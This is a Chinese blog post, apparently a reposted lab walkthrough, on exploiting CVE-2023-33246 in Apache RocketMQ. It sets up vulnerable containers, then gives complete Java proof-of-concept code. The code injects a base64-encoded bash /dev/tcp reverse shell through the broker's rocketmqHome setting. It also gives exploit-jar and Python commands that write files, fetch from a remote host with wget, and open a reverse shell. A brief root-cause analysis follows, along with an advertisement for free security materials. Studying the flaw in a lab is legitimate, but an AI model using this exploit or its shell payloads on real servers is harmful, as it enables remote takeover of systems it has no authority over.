RocketMQ是一款低延遲、高并發、高可用、高可靠的分布式訊息中間件,既可為分布式應用系統提供異步解耦和削峰填谷的能力,同時也具備互聯網應用所需的海量訊息堆積、高吞吐、可靠重試等特性,
影響版本
<=RocketMQ 5.1.0
<=RocketMQ 4.9.5
環境搭建
docker pull apache/rocketmq:4.9.4
root@ubuntu:/home/ubuntu/Desktop# docker run -d --name rmqnamesrv -p 9876:9876 apache/rocketmq:4.9.4 sh mqnamesrv //起nameserver創建broker.conf,并且修改組態檔內容
root@ubuntu:/home/ubuntu/Desktop# docker run -d --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -p 10909:10909 -p 10911:10911 -p 10912:10912 apache/rocketmq:4.9.4 sh mqbroker -c /home/rocketmq/rocketmq-4.9.4/conf/broker.conf //起Broker
docker ps
http://127.0.0.1:10912/
python3 check.py --ip 10.10.14.72 --port 9876
python3 CVE-2023-33246_RocketMQ_RCE_EXPLOIT.py 10.10.14.72 10911 wget 10.10.14.162:8666/1.txt
使用vulhub直接搭建可能效果好一點兒,否則,不知道為什么在漏洞利用執行上面命令的時候無回顯,可能exp的問題
【----幫助網安學習,以下所有學習資料免費領!加vx:yj009991,備注 “博客園” 獲取!】
① 網安學習成長路徑思維導圖
② 60+網安經典常用工具包
③ 100+SRC漏洞分析報告
④ 150+網安攻防實戰技術電子書
⑤ 最權威CISSP 認證考試指南+題庫
⑥ 超1800頁CTF實戰技巧手冊
⑦ 最新網安大廠面試題合集(含答案)
⑧ APP客戶端安全檢測指南(安卓+IOS)
cd vulhub/rocketmq/CVE-2023-33246
docker-compose up -dPOC如下
import org.apache.rocketmq.tools.admin.DefaultMQAdminExt;
?
import java.util.Base64;
import java.util.Properties;
?
public class poc {
private static String getCmd(String ip, String port) {
String cmd = "bash -i >& /dev/tcp/" + ip + "/" + port + " 0>&1";
String cmdBase = Base64.getEncoder().encodeToString(cmd.getBytes());
return "-c $@|sh . echo echo \"" + cmdBase + "\"|base64 -d|bash -i;";
}
?
public static void main(String[] args) throws Exception {
String targetHost = "目的IP";
String targetPort = "10911";
String shellHost = "VPSIP";
String shellPort = "Listen-port";
String targetAddr = String.format("%s:%s",targetHost,targetPort);
Properties props = new Properties();
props.setProperty("rocketmqHome", getCmd(shellHost,shellPort));
props.setProperty("filterServerNums", "1");
// 創建 DefaultMQAdminExt 物件并啟動
DefaultMQAdminExt admin = new DefaultMQAdminExt();
?
// admin.setNamesrvAddr("0.0.0.0:12345");
admin.start();
// 更新配置?件
admin.updateBrokerConfig(targetAddr, props);
Properties brokerConfig = admin.getBrokerConfig(targetAddr);
System.out.println(brokerConfig.getProperty("rocketmqHome"));
System.out.println(brokerConfig.getProperty("filterServerNums"));
// 關閉 DefaultMQAdminExt 物件
admin.shutdown();
}
}使用IDEA創建maven專案,創建xml檔案下載依賴,下載地址
https://mvnrepository.com/artifact/org.apache.rocketmq/rocketmq-tools/4.9.4
<!-- https://mvnrepository.com/artifact/org.apache.rocketmq/rocketmq-tools -->
<dependency>
<groupId>org.apache.rocketmq</groupId>
<artifactId>rocketmq-tools</artifactId>
<version>4.9.4</version>
</dependency>
修改POC
import org.apache.rocketmq.tools.admin.DefaultMQAdminExt;
?
import java.util.Base64;
import java.util.Properties;
?
public class poc {
private static String getCmd(String ip, String port) {
String cmd = "bash -i >& /dev/tcp/" + ip + "/" + port + " 0>&1";
String cmdBase = Base64.getEncoder().encodeToString(cmd.getBytes());
return "-c $@|sh . echo echo \"" + cmdBase + "\"|base64 -d|bash -i;";
}
?
public static void main(String[] args) throws Exception {
String targetHost = "10.10.14.72";
String targetPort = "10911";
String shellHost = "10.10.14.72";
String shellPort = "65532";
String targetAddr = String.format("%s:%s",targetHost,targetPort);
Properties props = new Properties();
props.setProperty("rocketmqHome", getCmd(shellHost,shellPort));
props.setProperty("filterServerNums", "1");
// 創建 DefaultMQAdminExt 物件并啟動
DefaultMQAdminExt admin = new DefaultMQAdminExt();
?
// admin.setNamesrvAddr("0.0.0.0:12345");
admin.start();
// 更新配置?件
admin.updateBrokerConfig(targetAddr, props);
Properties brokerConfig = admin.getBrokerConfig(targetAddr);
System.out.println(brokerConfig.getProperty("rocketmqHome"));
System.out.println(brokerConfig.getProperty("filterServerNums"));
// 關閉 DefaultMQAdminExt 物件
admin.shutdown();
}
}反彈結果
git clone https://github.com/SuperZero/CVE-2023-33246.git
java -jar CVE-2023-33246.jar -ip "127.0.0.1:10911" -cmd "222 >/root/2.txt"
進入容器,查看根部錄下檔案是已寫入
java -jar CVE-2023-33246.jar -ip "127.0.0.1:10911" -cmd "bash -i >& /dev/tcp/10.10.14.72/65532 0>&1"反彈shell
漏洞分析
啟動broker路由如下:
main:50, BrokerStartup (org.apache.rocketmq.broker)
start:55, BrokerStartup (org.apache.rocketmq.broker)
start:1570, BrokerController (org.apache.rocketmq.broker)
startBasicService:1527, BrokerController (org.apache.rocketmq.broker)
start:57, FilterServerManager (org.apache.rocketmq.broker.filtersrv)當在函式org.apache.rocketmq.broker.filtersrv.FilterServerManager61行
呼叫下面的createFilterServer方法,71行中看到從組態檔中獲取引數,72行呼叫方法buildStartCommand
該方法中取到變數NamesrvAddr和 RocketmqHome,獲取之后進行拼接cmd,在72行拿到拼接后的cmd
進入for回圈后在org.apache.rocketmq.broker.filtersrv.FilterServerUtil中給的callshell方法去執行命令
該中間件本來就是每30秒執行一次,漏洞產生的就是修改了組態檔,變數被賦值為了惡意命令,導致了命令執行,
更多網安技能的在線實操練習,請點擊這里>>
合天智匯:合天網路靶場、網安實戰虛擬環境
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/555564.html
標籤:其他
上一篇:黃金票據權限維持
下一篇:返回列表